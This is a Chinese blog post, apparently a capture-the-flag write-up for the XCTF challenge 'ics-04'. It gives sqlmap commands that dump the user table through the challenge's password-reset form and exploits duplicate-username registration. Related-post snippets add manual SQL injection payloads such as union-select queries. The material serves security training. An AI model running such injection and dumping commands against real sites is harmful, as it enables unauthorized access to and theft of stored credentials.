2020.4.10 xctf(ics-04)

最新推荐文章于 2020-10-05 10:20:46 发布
最新推荐文章于 2020-10-05 10:20:46 发布
阅读量465 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DSR446/article/details/105645540
版权

题目提示在登陆、注册页面有SQL注入漏洞
除了忘记密码的那块,其他地方都没找到注入点
在这里插入图片描述用sqlmap在这里跑一下,看有没有注入
获取数据库名:

python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" --dbs --batch

获取表名:

python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" -D cetc004 --tables --batch

获取字段名:

python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" -D cetc004 -T user --columns --batch

获取字段值:

python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" -D cetc004 -T user -C "username,password" --dump --batch

或者一步到位:

python sqlmap.py -u "http://159.138.137.79:49507/findpwd.php" --data "username=1" -D cetc004 --dump --batch

在这里插入图片描述得到一个我没有注册过的账号,猜测这个应该和flag有关,这个password应该是md5加密过的,试了没能解密成功,但这里不要紧,利用这里的
同一个用户名可以重复注册的漏洞,去注册一个新的账号,然后登录获得flag。

在这里插入图片描述

藏蓝色的达达
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界XCTFics-04
末初的CSDN博客
03-13 1101
有三个可以访问的地方,注册,登录和找回密码 注册功能:没有sql注入,但是测试出一个账号可以重复注册 登录功能:也没有sql注入,一个账号能够使用不同的面登录 找回密码页面存在SQL注入 sqlmap扫一波 记住需要指定参数 python2 sqlmap.py -u "http://111.198.29.45:33573/findpwd.php" --data="username=1" ...
XCTF ics-04
qq_41941506的博客
05-20 2814
根据题目提示在登录及注册中有漏洞 首先进入登录界面,寻求漏洞,BP抓包,发现为明文传输,第一个想到爆破,但是爆破结果不尽人意,没有任何用出;接下来进行SQL注入尝试,但是俩个界面均没有POST注入漏洞,正要放弃时,发现在登录界面还有一个忘记密码界面,尝试在该界面进行SQL注入, python2 sqlmap.py -r post.txt --dump -C "username,password...
XCTF-高手进阶区:ics-04
1stPeak's Blog
04-12 410
题目: 解题思路: 注入点在忘记密码处,使用sqlmap一把梭 sqlmap -r 1.txt --dbs --batch sqlmap -r 1.txt --dbs --batch -D cetc004 -T user -C 'username,password' --dump 直接解密md5,解密网址:https://www.somd5.com/ 然后使用c3tlwDmIn23登录,即可...
2020.4.8 xctf(fakebook)
DSR446的博客
04-10 640
提示让我们注册一个账号,这里随便注册,注意一下blog的格式就行。 然后用我们注册好的账号进行登录。 登录后发现url 为 http://111.198.29.45:33988/view.php?no=1 ,第一时间想到是否存在sql注入,我们输入 ’ 根据报错的显示,可以肯定存在sql注入的,然后我们用 order by 语句判断查询的字段数目,以便于后续进行 union 查询, 先 ...
2020.3.27 xctf(baby_web)①
DSR446的博客
03-27 250
观察题目内容,想想初始页面是哪个,再看看URL,尝试输入index.php试试看,发现直接跳转到1.php 那就用bp抓包拦截下来index.php页面,发送到repeater,go一下 ...
XCTF-Mobile】新手练习区-04-easyjava.apk
08-04
题目:https://adworld.xctf.org.cn/task/task_list?type=mobile&number=6&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/easyjava
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF-Mobile】新手练习区-12.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5095&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/hackermind
XCTF-Mobile】新手练习区-10-RememberOther.rar
09-01
题目:https://adworld.xctf.org.cn/task/answer?type=mobile&number=6&grade=0&id=5094&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/ctf/rememberother
XMan-MISC-诸葛建伟XCTF-public.pdf
12-04
MISC,中文即杂项,包括隐写,数据还原,脑洞、社会工程、与信息安全相关的大数据等。 竞赛过程中解MISC时会涉及到各种脑洞,各种花式技巧,主要考察选手的快速理解、学习能力以及日常知识积累的广度、深度。...
CTF ics-04
艺博东的博客
10-05 9934
难度系数: ★★★★ 题目来源: XCTF 4th-CyberEarth 题目描述: 工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 题目场景: http://220.249.52.133:52962(温馨提示:每次进入URL的端口号都不一样) 1、点击链接进入如下界面 2、先注册几个账号,相同的用户名 3、登录—>忘记密码 4、忘记密码 5、在kail Linux 里,开始sql注入 执行如下: 5.1 sqlmap ‐u "http://220.249.52.133:5296
2020.3.29 xctf(NewsCenter)①
DSR446的博客
03-29 409
打开题目,有一处搜索框,搜索新闻。考虑xss或sql注入 这里我们介绍两种手动和sqlmap ①手动测: 我们这里先用order by 手动测字段数,发现当4的时候页面就不能正常显示了,所以这里应该是3。 查询当前数据库中的所有表名: 1' union select 1,2,group_concat(table_name) from information_schema.tables where ...
[xctf]ics-04
胖胖的ALEX
07-10 4373
类型:web 网址:https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4918 描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag 一句话总结:sql注入、业务逻辑漏洞 过程: 有三个可以访问的功能,注册、登录和找回密码 注册功能:没有sql注入,一个账号可以重复注册漏洞...
攻防世界-高手进阶区之ics-04
Sacrifice_li的博客
06-11 774
进来页面是这样的: 注册页面: 我们就尝试随便注册一个用户,然后登陆发现没啥用: 这里还有一个忘记密码可以点击: 可以猜测这里有没有注入漏洞: 我注册的用户名为1,然后去试试 1’ and 1=1# 以及 1' and 1=2# ,发现是存在注入漏洞的。 然后就去判断字段数以及那个字段是有回显的,1' order by 4# 可以显示,然后-1’ union select 1,2,3,4: 3的位置是回显位置,接下来就是去找数据库名: -1' union select .
攻防世界web进阶区之ics-04
qq_45756971的博客
08-08 283
题目:进去点击右上角的注册界面先注册一个账号发现登陆不成功我们可以从那个忘记密码处寻找突破口,经过测试,发现这个页面存在SQL注入漏洞,在用户名框内输入 1’OR(1)OR’ ,页面发生了变化,成功绕过用户名检查。 找数据库名:-1’ union select 1,2,group_concat(schema_name),4 from information_schema.schemata # 数据名为cetc004,表名:-1’ union select 1,2,group_concat(table_nam
[wp] 攻防世界 ics-04
热门推荐
MercyLin的博客
09-24 2万+
尝试注册登陆账号 扫了下目录没发现什么,用sqlmap把每个页面跑过去,发现在找回密码页面有注入 sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" --...
攻防世界web进阶区ics-04详解
hxhxhxhxx的博客
08-07 272
攻防世界web进阶区ics-04详解题目详解 题目 打开环境,发现就一个登录和注册功能可以用。还有一个用户找回密码功能。 详解 我们发现有三个入口 注册,登录,找回密码 我们使用sqlmap扫描,发现只有找回密码可以进行sql注入 python2 sqlmap.py -r -batch --dbs cert中只有一个表 user 我们看他字段 登录成功获取flag 当然,这是在可以获取到密码的情况 实际上我们并不能一定可以解决 那么我们可以进行重复注册 我们尝试去覆盖他的原来的账号密码,
攻防世界web进阶区ics-04
gongjingege的博客
08-03 221
题目描述:工控云管理系统新添加的登录和注册页面存在漏洞,请找出flag。 考虑是否存在注入漏洞 只有三个地方可以点,登录,注册,忘记密码 先注册 普通用户登录没什么用,估计得管理员登录 登录和注册页面没有注入点,就忘记密码 测试后存在注入,1’or 1=1#绕过 手工测试,后台过滤了一部分,直接union select, 1’ union select 1,2,3,4# 页面回显正常 查询数据库 1’ union select 1,2,group_concat(schema_name),4 fr
XCTF攻防世界题目ics-04(XCTF 4th-CyberEarth)
daqiangdetianxia的博客
08-18 459
为了避免眼高手低,能用手工我决定把一些题目的详细思路和思考过程写一遍。就当是总结吧。 简单的一道sql注入题目加一个简单的逻辑漏洞。 信息搜集 页面:login.php,register.php,findpwd.php 服务器:Apache/2.4.7 (Ubuntu) ICS工业控制系统 漏洞查找 一、 经过测试,发现findpwd页面存在sql注入漏洞 二、手工注入 1.确定列数 admin1' order by 4#经过测试,一共有四列,其中admin1是我自己注册的用户。 2.确定注入列数. .
web-ics-05
最新发布
07-28
- *1* *3* [xctf-web-ics05](https://blog.csdn.net/zhejichensha_l7l/article/details/113530046)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值